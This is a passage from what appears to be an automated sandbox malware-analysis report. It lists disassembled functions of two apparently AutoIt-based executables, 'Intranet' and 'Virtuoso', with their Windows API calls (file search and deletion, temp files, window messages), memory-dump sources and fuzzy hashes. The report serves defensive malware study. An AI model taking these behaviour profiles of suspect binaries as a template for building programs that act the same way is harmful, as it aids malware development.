                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?,?,?,ListBox,?,?,ComboBox), ref: 004F9A2B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            • Opcode ID: 1cb8c9e823b05178aac533ee7d404e6cd62979919b0ce7efd0def89a208b3d8f
                                                                            • Instruction ID: f1d178a6a68a52b7abbe8376e5816781b369b4bc36501d8edbca8d7bc5eac3fd
                                                                            • Opcode Fuzzy Hash: 1cb8c9e823b05178aac533ee7d404e6cd62979919b0ce7efd0def89a208b3d8f
                                                                            • Instruction Fuzzy Hash: 3001F571A42218AB8B14EBA5CC62DFE7769EF56320B40070FF961533D1EA395C089664
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004ABC07
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            • _wcscat.LIBCMT ref: 004E3593
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: FullNamePath_memmove_wcscat
                                                                            • String ID: sV
                                                                            • API String ID: 257928180-1647004264
                                                                            • Opcode ID: 3ba43cff4d09337b51f115a97f1f76b4f27a5ff396c3bfd0b28b6f60880c23ba
                                                                            • Instruction ID: 4a5b08a59bb9e45fbf95d8d6b98a2008bace82e99ce50f35af659c4d78d9d5a3
                                                                            • Opcode Fuzzy Hash: 3ba43cff4d09337b51f115a97f1f76b4f27a5ff396c3bfd0b28b6f60880c23ba
                                                                            • Instruction Fuzzy Hash: 1811C630A0420C968B01FBA48855ECD77A8FF19354B1004AFB94497351EF7497845BA5
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock_memmove
                                                                            • String ID: EA06
                                                                            • API String ID: 1988441806-3962188686
                                                                            • Opcode ID: dccf929c3b0320a9eb34566ab9e782b1b54f98afd1a7ffc58787f03b21240f48
                                                                            • Instruction ID: a73419bbbb7cefd1f6d0d72fb0d2fd9748d42f0176c11413b1536f556dd3e421
                                                                            • Opcode Fuzzy Hash: dccf929c3b0320a9eb34566ab9e782b1b54f98afd1a7ffc58787f03b21240f48
                                                                            • Instruction Fuzzy Hash: D601F9728042587EDF28C6A9CC56FFEBBF89B01301F00459FF552D21C2E579E6188B60
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 004FB79A: GetClassNameW.USER32(?,?,000000FF), ref: 004FB7BD
                                                                            • SendMessageW.USER32(?,00000180,00000000,?,?,?,ListBox,?,?,ComboBox), ref: 004F9923
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            • Opcode ID: 9095e74076caf38f95cd04fac7338ce2b770a1464d222dd3b4dcf2fc809c61b2
                                                                            • Instruction ID: 8c39a381b10c07e9f83af9be4045dc2dc42f7e1f6a08cd68ced0a5eaf162f516
                                                                            • Opcode Fuzzy Hash: 9095e74076caf38f95cd04fac7338ce2b770a1464d222dd3b4dcf2fc809c61b2
                                                                            • Instruction Fuzzy Hash: 5301A7B1A4210C6BCB14FBA1C962EFF77ACDF15344F50011FB94263391EA585E0C96B5
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 004FB79A: GetClassNameW.USER32(?,?,000000FF), ref: 004FB7BD
                                                                            • SendMessageW.USER32(?,00000182,?,00000000,?,?,ListBox,?,?,ComboBox), ref: 004F99A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            • Opcode ID: 8d38208908703c25653a820657ced93511e9b3a96b94805bdafe4162070d15d0
                                                                            • Instruction ID: d5184428554d86d4d40764da2095a7b2b9e0d3c40708e273d17176ee640eb719
                                                                            • Opcode Fuzzy Hash: 8d38208908703c25653a820657ced93511e9b3a96b94805bdafe4162070d15d0
                                                                            • Instruction Fuzzy Hash: CB0126B2A4210C67CB10EBA1C962FFF77AC9F15340F50011FBD41A3391EA685F0896BA
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: __calloc_crt
                                                                            • String ID: @bV
                                                                            • API String ID: 3494438863-1511565622
                                                                            • Opcode ID: f9e42cb03f7cb983a5a1ceb8c8c58bf7c68039268b21284ae509efe7e00b88a6
                                                                            • Instruction ID: 3fd70a499cbbc95862f051c8e40fdb1cdb19477bc4f7de741d352fe48b35b637
                                                                            • Opcode Fuzzy Hash: f9e42cb03f7cb983a5a1ceb8c8c58bf7c68039268b21284ae509efe7e00b88a6
                                                                            • Instruction Fuzzy Hash: 2BF0A47931C2168BE7B48F1DFC21FA227D5E764328F11916FF102CB288E77888815688
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcscmp
                                                                            • String ID: #32770
                                                                            • API String ID: 2292705959-463685578
                                                                            • Opcode ID: 7685dcec8ec61bc30e4781fac99b10533f1b4a2ef5e975bd9358833b4d0846a6
                                                                            • Instruction ID: cc07aa38f17dc0e071433013f275ec8de6e3bd8b110fa90ca2d2987b54478cd5
                                                                            • Opcode Fuzzy Hash: 7685dcec8ec61bc30e4781fac99b10533f1b4a2ef5e975bd9358833b4d0846a6
                                                                            • Instruction Fuzzy Hash: 8CE0613650032827D720AA59AC09FABFBACEB15731F00001BFC04D3051E560A90487E0
                                                                            APIs
                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004F88A0
                                                                              • Part of subcall function 004C3588: _doexit.LIBCMT ref: 004C3592
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Message_doexit
                                                                            • String ID: AutoIt$Error allocating memory.
                                                                            • API String ID: 1993061046-4017498283
                                                                            • Opcode ID: b4a4943bc6e44e06bf3c6eda5e12be06b05aeb48d4fcacf01b460c5140c86f39
                                                                            • Instruction ID: be1cf1c06075e4b68f837cfec656d73ec0fe93f36c4fce04f9989aa5f782e2bd
                                                                            • Opcode Fuzzy Hash: b4a4943bc6e44e06bf3c6eda5e12be06b05aeb48d4fcacf01b460c5140c86f39
                                                                            • Instruction Fuzzy Hash: 76D0C23128031832C25032E66C1BFCA2A488B06B55F00442FBB08651C349D9898441AD
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 004E0091
                                                                              • Part of subcall function 0051C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,004E027A,?), ref: 0051C6E7
                                                                              • Part of subcall function 0051C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0051C6F9
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 004E0289
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                            • String ID: WIN_XPe
                                                                            • API String ID: 582185067-3257408948
                                                                            • Opcode ID: 21b1d44cb00d30d78af85f1a718b3f88e7cfc42fb617f2e9478837a79aa66e8b
                                                                            • Instruction ID: 7f4e130e97d7a2177d5efce639fa427fc4510818cbcce88f7a93dbace94b0486
                                                                            • Opcode Fuzzy Hash: 21b1d44cb00d30d78af85f1a718b3f88e7cfc42fb617f2e9478837a79aa66e8b
                                                                            • Instruction Fuzzy Hash: 8BF0ED70800149CFCB21CBA1D998BEDBBF8AB48301F200082E252B2290CBB84FC4DF25
                                                                            APIs
                                                                            • DestroyIcon.USER32(,zV0zV,00567A2C,00567890,?,004B5A53,00567A2C,00567A30,?,00000004), ref: 004B5823
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyIcon
                                                                            • String ID: ,zV0zV$SZK,zV0zV
                                                                            • API String ID: 1234817797-1785309768
                                                                            • Opcode ID: 3b0cd1cd7feb28445eb8fdfd15d6133d350d81617a764624ab831405f21d8e90
                                                                            • Instruction ID: 4f8705c0f1ebcacbeffda30560c5fcf1dab07b2947cb98d2ca0ca6989ee0f902
                                                                            • Opcode Fuzzy Hash: 3b0cd1cd7feb28445eb8fdfd15d6133d350d81617a764624ab831405f21d8e90
                                                                            • Instruction Fuzzy Hash: 68E01232414246EBE7213F49D8007D5FBE8EF69321F648457E48456251D3B968B0DBA9
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00509EB5
                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00509ECC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Temp$FileNamePath
                                                                            • String ID: aut
                                                                            • API String ID: 3285503233-3010740371
                                                                            • Opcode ID: 1656de1e89d30ec45214b8dcbd70ed6a7714e91da4d48ae15b56743966e96aee
                                                                            • Instruction ID: ad22ab7ff5d560013a8f08040ed97618091b5802b5dd025700ff1809011f6e67
                                                                            • Opcode Fuzzy Hash: 1656de1e89d30ec45214b8dcbd70ed6a7714e91da4d48ae15b56743966e96aee
                                                                            • Instruction Fuzzy Hash: F6D05E7954030DABDBA0AB90DC0EFDBBB2CEB14701F0042A2BE58911E2DA7055A89B91
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000,00000111,000001A0,00000000), ref: 00525FEB
                                                                            • PostMessageW.USER32(00000000), ref: 00525FF2
                                                                              • Part of subcall function 005057FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00505877
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: 408ee026972f781006651a2ff12524d5ce44e0a50ccbe63903c07de653852687
                                                                            • Instruction ID: 51141600fe842c63f6b060d026ab051cbdbd7683ced8a85322f891ab154b129d
                                                                            • Opcode Fuzzy Hash: 408ee026972f781006651a2ff12524d5ce44e0a50ccbe63903c07de653852687
                                                                            • Instruction Fuzzy Hash: 01D0A932380711AAF664A7309C2FFCB2A10BB50B40F000825B246EA2C0C9E06808CB04
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00525FAB
                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00525FBE
                                                                              • Part of subcall function 005057FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00505877
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: 9ca2428d7fd8afc2cdccd99df02c91bd16a12cbae4a361ff2ad784a946d51a04
                                                                            • Instruction ID: 132c4dcd4d8ef2ce5239247fa8e26f60fd56a9f139cbd2601a0df162798b0918
                                                                            • Opcode Fuzzy Hash: 9ca2428d7fd8afc2cdccd99df02c91bd16a12cbae4a361ff2ad784a946d51a04
                                                                            • Instruction Fuzzy Hash: 24D0A932380711AAE664A7309C2FFDB2E10BB50B40F000825B24AAA2C0C9E05808CB00
                                                                            APIs
                                                                              • Part of subcall function 001A0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00192A58,?,00008000), ref: 001A02A4
                                                                              • Part of subcall function 001E4FEC: GetFileAttributesW.KERNEL32(?,001E3BFE), ref: 001E4FED
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 001E407C
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 001E40CC
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 001E40DD
                                                                            • FindClose.KERNEL32(00000000), ref: 001E40F4
                                                                            • FindClose.KERNEL32(00000000), ref: 001E40FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 2649000838-1173974218
                                                                            • Opcode ID: 417f00bb5a8a652b4d02066ea21fb44512aa8c22b395407d392c0d5f7e2acf50
                                                                            • Instruction ID: c11b472f3fbda1c9b57c816cd65bced14a08048c58745d881de0dc0c1aa49223
                                                                            • Opcode Fuzzy Hash: 417f00bb5a8a652b4d02066ea21fb44512aa8c22b395407d392c0d5f7e2acf50
                                                                            • Instruction Fuzzy Hash: B2316131008386ABC705EF64D8959EFB7A8BEA5304F444A2DF9E582191EB34DA49C762
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0020A0F7
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0020A1B0
                                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 0020A1CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: 0
                                                                            • API String ID: 2326795674-4108050209
                                                                            • Opcode ID: cd0f676a1c2463c424ecc83582ade92a7ad233a54589ca49a6fec2ec9a7b8983
                                                                            • Instruction ID: 3fa61d6259e1269c6d08ee313754305259137d48aabdb40538665ea6be4699c5
                                                                            • Opcode Fuzzy Hash: cd0f676a1c2463c424ecc83582ade92a7ad233a54589ca49a6fec2ec9a7b8983
                                                                            • Instruction Fuzzy Hash: 4202E030128302AFDB15CF18D888BAABBE5FF45314F84852DF995962E2C7B5D960CF52
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,?,?,001CF8B8,00000001,0000138C,00000001,?,00000001,?,001F3FF9,?), ref: 001E009A
                                                                            • LoadStringW.USER32(00000000,?,001CF8B8,00000001,0000138C,00000001,?,00000001,?,001F3FF9,?,00000001,?,001F3FF9,00000040,00000064), ref: 001E00A3
                                                                              • Part of subcall function 00191A36: _memmove.LIBCMT ref: 00191A77
                                                                            • GetModuleHandleW.KERNEL32(00000000,00247310,?,00000FFF,?,?,001CF8B8,00000001,0000138C,00000001,?,00000001,?,001F3FF9,?,00000001), ref: 001E00C5
                                                                            • LoadStringW.USER32(00000000,?,001CF8B8,00000001,0000138C,00000001,?,00000001,?,001F3FF9,?,00000001,?,001F3FF9,00000040,00000064), ref: 001E00C8
                                                                            • __swprintf.LIBCMT ref: 001E0118
                                                                            • __swprintf.LIBCMT ref: 001E0129
                                                                            • _wprintf.LIBCMT ref: 001E01D2
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010,?,Error: ,00213B88,?), ref: 001E01E9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
